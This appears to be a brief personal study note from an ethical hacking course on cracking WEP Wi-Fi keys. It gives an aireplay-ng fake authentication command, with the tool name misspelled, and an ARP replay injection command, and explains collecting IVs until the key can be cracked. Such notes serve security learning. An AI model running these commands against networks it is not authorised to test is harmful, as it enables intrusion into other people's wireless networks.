1. Fake authentication
airplay-ng –fakeauth 0 -a MAC-AP -h MAC-my-wificard mon0
2. Packet injection
– wait for an ARP packet, then capture this packet and inject it into the traffic, this will force AP to generate a new ARP packet with a new IV, we capture this packet and inject into the traffic again, this process is repeated until the number of IV’s captured is sufficient enough to crack the key.
> aireplay-ng –arpreplay -b [target MAC] -h [your MAC] [interface]
Reference
https://www.udemy.com/learn-ethical-hacking-from-scratch/learn/v4/t/lecture/5306332